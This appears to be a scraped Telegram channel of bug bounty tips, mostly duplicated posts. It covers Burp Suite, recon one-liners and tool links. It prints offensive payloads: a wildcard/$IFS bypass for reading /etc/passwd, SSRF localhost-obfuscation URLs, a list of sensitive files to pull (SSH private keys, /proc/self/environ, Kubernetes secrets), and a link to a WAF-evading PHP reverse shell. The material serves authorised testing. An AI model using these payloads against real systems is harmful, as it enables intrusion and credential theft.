#BurpHacksForBounties - Day 25/30
Optimizing Burp Suite for better performance, these 4 simple steps and you would notice a big difference in performance.
#infosec #appsec #burp #security #bugbountytips #bugbounty
Optimizing Burp Suite for better performance, these 4 simple steps and you would notice a big difference in performance.
#infosec #appsec #burp #security #bugbountytips #bugbounty
#BurpHacksForBounties - Day 26/30
Красное сердцеUnderstand the different intruder attack types in Burp Suite
With visualizations at code level for better understanding.
Code level understanding in follow up thread 👇
#infosec #appsec #security #cybersecurity #bugbounty #bugbountytips
Красное сердцеUnderstand the different intruder attack types in Burp Suite
With visualizations at code level for better understanding.
Code level understanding in follow up thread 👇
#infosec #appsec #security #cybersecurity #bugbounty #bugbountytips
#BurpHacksForBounties - 27/30
See all different intruder attack types of Burp Suite as codes
- Sniper
- Battering RAM
- Cluster Bomb
- PitchFork
#infosec #appsec #bugbounty #bugbountytips #security #burp
See all different intruder attack types of Burp Suite as codes
- Sniper
- Battering RAM
- Cluster Bomb
- PitchFork
#infosec #appsec #bugbounty #bugbountytips #security #burp
This media is not supported in your browser
VIEW IN TELEGRAM
#BurpHacksForBounties - Day 28/30 - Super CSRF POC Generator Hack.
CSRF POC generator is only available in Burp Suite pro, but not anymore.
Use this -> https://github.com/merttasci/csrf-poc-generator by @mertistaken
#infosec #burp #appsec #security #bugbountytips #bugbountytip #cybersecurity
CSRF POC generator is only available in Burp Suite pro, but not anymore.
Use this -> https://github.com/merttasci/csrf-poc-generator by @mertistaken
#infosec #burp #appsec #security #bugbountytips #bugbountytip #cybersecurity
#BurpHacksForBounties - Day 29/30
No Collaborator No worries
Burp Suite Collaborator is part of pro, so use requestbin.net
- Exactly same as collaborator
- Free 20 requests without login
- HTTP bin
- DNS bin
#infosec #appsec #bugbountytips #bugbountytip #burp
No Collaborator No worries
Burp Suite Collaborator is part of pro, so use requestbin.net
- Exactly same as collaborator
- Free 20 requests without login
- HTTP bin
- DNS bin
#infosec #appsec #bugbountytips #bugbountytip #burp
Git-Secret
Go scripts for finding an API key / some keywords in a github repository
https://github.com/daffainfo/Git-Secret
#bugbounty #bugbountytips #pentest #api #infosec
Go scripts for finding an API key / some keywords in a github repository
https://github.com/daffainfo/Git-Secret
#bugbounty #bugbountytips #pentest #api #infosec
Search JS using Gau
#bugbounty #bugbountytips
gau -subs DOMAIN |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt#bugbounty #bugbountytips
Forget Password Vulns
https://www.xmind.net/m/nZwbdk/
#AppSec #hacking #bugbountytips #websecurity #xmind
https://www.xmind.net/m/nZwbdk/
#AppSec #hacking #bugbountytips #websecurity #xmind
Xmind
Common Vulnerabilities on Forget Password Functionality
A Mind Map about Common Vulnerabilities on Forget Password Functionality submitted by Harsh Bothra on Jul 23, 2021. Created with Xmind.
Search Subdomains using Jldc
#bugbounty #bugbountytips
curl -s "jldc.me/anubis/subdomains/example.com" | grep -Po '(?<=")[\w*.-]*(?=")'
#bugbounty #bugbountytips
Search JS using Gau
gau -subs DOMAIN |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt
#bugbounty #bugbountytipsApache HTTP Server 2.4.49 Path Traversal (CVE-2021-41773)
https://twitter.com/ducnt_/status/1445386557574324234
#cve #apache
https://twitter.com/ducnt_/status/1445386557574324234
#cve #apache
Twitter
Nguyen The Duc
Just got worked exploit PoC for path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) with my collab again @yabeow #bugbountytips 👀
LFI Bypass
#bugbounty #bugbountytips #lfi
1) /usr/bin/cat /etc/passwd == /???/???/c?t$IFS/?t?/p?s?wd
2) /*/?at$IFS/???/???swd
3)/****/?at$IFS/???/*swd
4)/****/?at$IFS/???/*******swd
(IFS is Internal Field Separator = [space], [tab] or a [newline])#bugbounty #bugbountytips #lfi
Best SSRF bypass
#ssrf #bugbounty #bugbountytips
http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01#ssrf #bugbounty #bugbountytips
Django Debug Mode Bypass
https://target/login?next=/#bugbounty #bugbountytips #bugbountytip
https://target/admin
[301 to https://target/admin/login/?next=/admin/]
Change request to [POST]
[500 Django DEBUG mode and vary bad information]
Finding Sensitive Files for BugBounty
—
—
/proc/self/cwd/index.php
— /proc/self/cwd/main.py
— /etc/motd
— /proc/net/udp
— /proc/net/arp
— /proc/self/environ
— /var/run/secrets/kubernetes.io/serviceaccount
— /proc/cmdline
— /proc/mounts
— /etc/motd
— /etc/mysql/my.cnf
— /proc/sched_debug
— /home/ user/.bash_history
— /home/user/.ssh/id_rsa
#sensitive #files #bugbounty #bugbountytips👍1
Forwarded from Offensive Xwitter
😈 [ 0x0SojalSec, Md Ismail Šojal ]
The shortest payload for a tiny php reverse shell written in 19 bytes using only non-alphanumeric characters. Hex values inside ⛶ indicate raw bytes.
This will help to bypass WAF and execute PHP reverse shell for RCE.
get more detail about this👇
🔗 https://gist.github.com/0xSojalSec/5bee09c7035985ddc13fddb16f191075
#bugbountyTips #bugbounty
🐥 [ tweet ]
The shortest payload for a tiny php reverse shell written in 19 bytes using only non-alphanumeric characters. Hex values inside ⛶ indicate raw bytes.
This will help to bypass WAF and execute PHP reverse shell for RCE.
get more detail about this👇
🔗 https://gist.github.com/0xSojalSec/5bee09c7035985ddc13fddb16f191075
#bugbountyTips #bugbounty
🐥 [ tweet ]
❤5👍3👎1